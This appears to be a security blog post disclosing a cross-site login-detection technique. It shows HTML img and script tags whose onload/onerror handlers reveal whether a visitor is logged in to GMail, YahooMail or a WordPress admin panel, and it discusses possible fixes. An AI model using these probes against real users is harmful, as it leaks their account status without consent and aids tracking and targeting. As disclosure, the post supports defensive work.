I’m sure similar URLs can be found on most any website with user accounts. The GMail URL responds with an image when the user is logged-in and HTML when their not. The YahooMail URL responds with just a simple HTML comment when logged-in or a large HTML error page when their not. The ha.ckers.org URL will only be served if you are logged as an admin on Wordpress, otherwise a forbidden message appears.
The ways the URLs respond are subtly different and require slightly unique approaches when applied to Firefox 3 (b3) as we’ll see next.
For GMail its extremely simple.
<* img src="https://mail.google.com/mail/pimages/2/icons_ns1.png" onload="alert('GMail: Logged-In')" onerror="alert('Gmail: Not Logged-in')">
The IMG tag onload event handler fires if a valid image returns while the onerror event handler fires on invalid images (example: receives HTML). Easy boolean logic. Of course additional code is required to send the results back to the server but that’s beyond our scope here.
The ha.ckers.org is exactly the same as GMail.
<* img src="http://ha.ckers.org/blog/wp-admin/images/toggle.gif" onload="alert('RSnake: Logged-In')" onerror="alert('RSnake: Not Logged-in')">
The YahooMail example is almost as simple, but has to be implemented a little differently since we’re dealing with only HTML responses and no images.
<* script src="http://us.mg1.mail.yahoo.com/dc/rs?log=SuccessfulLaunch" onload="alert('YahooMail: Logged-in')" onerror="alert('YahooMail: Not Logged-in')">* script>
Websites owners can do one of two things here:
Remove authentication from the resource if the content isn’t particularly sensitive
Add CSRF-like secret tokens so that the URL is not predictable
At the end of the day though its unlikely that any of these websites, or others with similar issues, will take either step. Even if they did there are so many other ways to pull off the same attack (timing attacks, monitoring onload events, probing for named iframes, JS console errors, etc) which makes the value somewhat limited. I had a long discussion with Chris Evans and Rich Cannings from Google about this particular issue to get their insights.
In our collective opinions its probably not the responsibility of the websites owners to change their (arguably secure) application behavior to compensate for the browser leaking cross-domain information. Though they still could if they really wanted to. Also its probably a lot easier for the browser vendors to remedy this issue in some clever way rather than every website owner doing the above. What do you think?